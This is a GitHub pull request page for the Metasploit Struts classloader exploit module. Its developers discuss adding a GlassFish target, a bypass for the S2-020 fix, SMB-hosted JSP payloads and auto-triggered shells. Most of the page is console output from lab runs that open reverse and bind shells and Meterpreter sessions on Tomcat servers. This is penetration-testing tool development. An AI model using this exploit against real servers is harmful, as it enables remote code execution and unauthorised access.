Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add improvements for docBase exploitation vector #4890

Merged
merged 4 commits into from Mar 12, 2015
Merged

Add improvements for docBase exploitation vector #4890

merged 4 commits into from Mar 12, 2015

Conversation

julianvilas
Copy link
Contributor

Added the following improvements to the module:

  • Added GlassFish app server as a target
  • Added bypass for S2-020 (fixed in S2-021)
  • Make UNC resource (share, file name and file folder) random but using ".jsp" extension
  • Added auto-triggering of the JSP shell

Testing env:

  • rev: a13cd2b
  • Windows XP
  • Tomcat 7.0.59
msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.17.1.63                yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.1.3       yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   3   Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started reverse handler on 172.17.1.3:4444 
[*] Server started.
[*] JSP payload available on \\172.16.218.197\bnekdX\crNveL.jsp...
[*] 172.17.1.63:8080 - Modifying Class Loader...
[*] 172.17.1.63:8080 - Accessing JSP shell at /hello_world/crNveL.jsp...
[*] Command shell session 1 opened (172.17.1.3:4444 -> 172.17.1.63:3545) at 2015-03-07 20:37:20 +0100
[*] Server stopped.

Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test>

@julianvilas
Copy link
Contributor Author

There are two more things for fixing:

  • Java payload was not working for Tomcat 8
  • The cleanup of JSP wasn't working because the expected CWD was wrong

I'm working on it too, will append the changes to this PR and let you know.

@julianvilas
Copy link
Contributor Author

OK, Java payload for Tomcat 8 has been fixed too.

  • Ubuntu 14.04.01 - Linux ubuntu 3.13.0-32-generic Nexpose #57-Ubuntu SMP (x86-64)
  • apache-tomcat-8.0.18
  • git rev: a13cd2b
    • java version "1.7.0_76"

Native meterpreter:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.194             yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         172.16.218.194   no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] 172.16.218.194:8080 - Modifying Class Loader...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[*] 172.16.218.194:8080 - Countdown 6...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/lrO472.jsp
[*] 172.16.218.194:8080 - Generating JSP...
[*] 172.16.218.194:8080 - Dumping JSP into the logfile...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/lrO472.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 172.16.218.194
[*] Meterpreter session 1 opened (172.16.218.1:53415 -> 172.16.218.194:4444) at 2015-03-10 00:04:15 +0100
[+] Deleted webapps/ROOT/lrO472.jsp
[+] Deleted GzdBW

ARCH_JAVA:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.194             yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (java/jsp_shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.218.194   no        The target address
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Java

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] 172.16.218.194:8080 - Modifying Class Loader...
[*] Started bind handler
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/BYBs35.jsp
[*] 172.16.218.194:8080 - Generating JSP...
[*] 172.16.218.194:8080 - Dumping JSP into the logfile...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[*] 172.16.218.194:8080 - Countdown 6...
[*] 172.16.218.194:8080 - Countdown 5...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/BYBs35.jsp
[*] Command shell session 3 opened (172.16.218.1:53507 -> 172.16.218.194:4444) at 2015-03-10 00:06:36 +0100
[+] Deleted webapps/ROOT/BYBs35.jsp

2945551580
DxTDEUjVusPonXZYzttQFIHvuoQxNxEX
uidGkuWURRIfXvWwYDXQarIBbITnJoiE
  • Windows XP
  • apache-tomcat-8.0.20
  • git rev: a13cd2b
    • java version "1.7.0_75"

Native meterpreter:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.148             yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.16.218.148   no        The target address


Exploit target:

   Id  Name
   --  ----
   2   Windows


msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] 172.16.218.148:8080 - Modifying Class Loader...
[*] 172.16.218.148:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.148:8080 - Countdown 10...
[*] 172.16.218.148:8080 - Countdown 9...
[*] 172.16.218.148:8080 - Countdown 8...
[+] 172.16.218.148:8080 - Log file flushed at http://172.16.218.148:8080/L4lBc29.jsp
[*] 172.16.218.148:8080 - Generating JSP...
[*] 172.16.218.148:8080 - Dumping JSP into the logfile...
[*] 172.16.218.148:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.148:8080 - Countdown 10...
[*] 172.16.218.148:8080 - Countdown 9...
[*] 172.16.218.148:8080 - Countdown 8...
[*] 172.16.218.148:8080 - Countdown 7...
[+] 172.16.218.148:8080 - Log file flushed at http://172.16.218.148:8080/L4lBc29.jsp
[*] Sending stage (770048 bytes) to 172.16.218.148
[*] Meterpreter session 10 opened (172.16.218.1:54145 -> 172.16.218.148:4444) at 2015-03-10 00:40:17 +0100
[!] This exploit may require manual cleanup of 'webapps/ROOT/L4lBc29.jsp' on the target
[!] This exploit may require manual cleanup of 'lyXD' on the target

meterpreter > exit

ARCH_JAVA:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.148             yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (java/jsp_shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.218.148   no        The target address
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Java


msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] 172.16.218.148:8080 - Modifying Class Loader...
[*] Started bind handler
[*] 172.16.218.148:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.148:8080 - Countdown 10...
[*] 172.16.218.148:8080 - Countdown 9...
[*] 172.16.218.148:8080 - Countdown 8...
[*] 172.16.218.148:8080 - Countdown 7...
[*] 172.16.218.148:8080 - Countdown 6...
[+] 172.16.218.148:8080 - Log file flushed at http://172.16.218.148:8080/Tiar05.jsp
[*] 172.16.218.148:8080 - Generating JSP...
[*] 172.16.218.148:8080 - Dumping JSP into the logfile...
[*] 172.16.218.148:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.148:8080 - Countdown 10...
[*] 172.16.218.148:8080 - Countdown 9...
[*] 172.16.218.148:8080 - Countdown 8...
[*] 172.16.218.148:8080 - Countdown 7...
[+] 172.16.218.148:8080 - Log file flushed at http://172.16.218.148:8080/Tiar05.jsp
[*] Command shell session 1 opened (172.16.218.1:54237 -> 172.16.218.148:4444) at 2015-03-10 00:48:28 +0100
[+] Deleted webapps/ROOT/Tiar05.jsp

Microsoft Windows XP [Versi?n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test>echo 334169013;echo hstrXPISPRrOsxkrltZkdLxYpojGVeOU
334169013;echo hstrXPISPRrOsxkrltZkdLxYpojGVeOU

C:\Documents and Settings\test>
C:\Documents and Settings\test>rm -f "webapps/ROOT/Tiar05.jsp" >/dev/null ; echo ' & attrib.exe -r "webapps\ROOT\Tiar05.jsp" & del.exe /f /q "webapps\ROOT\Tiar05.jsp" & echo " ' >/dev/null;echo CfrTXOzQzuioWCRjNdLiStpREfOHuEtC
No se encuentra la ruta de acceso: C:\Documents and Settings\test\webapps\ROOT
" ' >/dev/null;echo CfrTXOzQzuioWCRjNdLiStpREfOHuEtC

C:\Documents and Settings\test>

@julianvilas
Copy link
Contributor Author

The auto-cleanup doesn't work in a reliable way.

Native binaries must be cleaned always in current directory because it's where they are created. This works fine in Linux, however in Windows the file is not being cleaned (seems that it's because the file is open by the process).

JSP location is always "$TOMCAT_HOME/webapps/ROOT". For this reason a relative path to it will depend on the current CWD value. The bad thing here is that as stated in #4667 the user could think that the file has been deleted while it hasn't.

julianvilas
julianvilas reviewed Mar 10, 2015
View reviewed changes
modules/exploits/multi/http/struts_code_exec_classloader.rb
register_files_for_cleanup(payload_file)
end

register_files_for_cleanup(payload_file)
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

always use CWD, is where the dropped binary should be

@jvazquez-r7 jvazquez-r7 self-assigned this Mar 12, 2015
@jvazquez-r7
Copy link
Contributor

  • Tomcat 8
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:8080 - Modifying Class Loader...
[*] 172.16.158.134:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.134:8080 - Countdown 10...
[*] 172.16.158.134:8080 - Countdown 9...
[*] 172.16.158.134:8080 - Countdown 8...
[+] 172.16.158.134:8080 - Log file flushed at http://172.16.158.134:8080/gX74554.jsp
[*] 172.16.158.134:8080 - Generating JSP...
[*] 172.16.158.134:8080 - Dumping JSP into the logfile...
[*] 172.16.158.134:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.134:8080 - Countdown 10...
[*] 172.16.158.134:8080 - Countdown 9...
[*] 172.16.158.134:8080 - Countdown 8...
[*] 172.16.158.134:8080 - Countdown 7...
[+] 172.16.158.134:8080 - Log file flushed at http://172.16.158.134:8080/gX74554.jsp
[*] Sending stage (770048 bytes) to 172.16.158.134
[+] Deleted webapps/ROOT/gX74554.jsp
[!] This exploit may require manual cleanup of 'vJAY' on the target
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > pwd
C:\apache-tomcat-8.0.20
meterpreter > exit
[*] Shutting down Meterpreter...
  • Tomcat 7
msf exploit(struts_code_exec_classloader) > set target 3
target => 3
msf exploit(struts_code_exec_classloader) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Server started.
[*] JSP payload available on \\172.16.158.1\PIZWKK\EnMyN.jsp...
[*] 172.16.158.134:8080 - Modifying Class Loader...
[*] SMB Share - 172.16.158.134 SMB_COM_NT_CREATE_ANDX for EnMyN.jsp, not found
[*] 172.16.158.134:8080 - Accessing JSP shell at /struts2-blank/example/EnMyN.jsp...
[*] SMB Share - 172.16.158.134 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\PIZWKK\EnMyN.jsp...
[*] Server stopped.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\apache-tomcat-7.0.53>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 172.16.158.134
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 172.16.158.2

Ethernet adapter Bluetooth Network Connection:

        Media State . . . . . . . . . . . : Media disconnected

C:\apache-tomcat-7.0.53>

@jvazquez-r7 jvazquez-r7 merged commit fe822f8 into rapid7:master Mar 12, 2015
jvazquez-r7 added a commit that referenced this pull request Mar 12, 2015
@jvazquez-r7
Land #4890, @julianvilas's improvements struts_code_exec_classloader
75b2ef8
@julianvilas julianvilas deleted the redsadic-smbtrigger branch March 12, 2015 22:33
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@jvazquez-r7 jvazquez-r7

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@julianvilas @jvazquez-r7 @todb-r7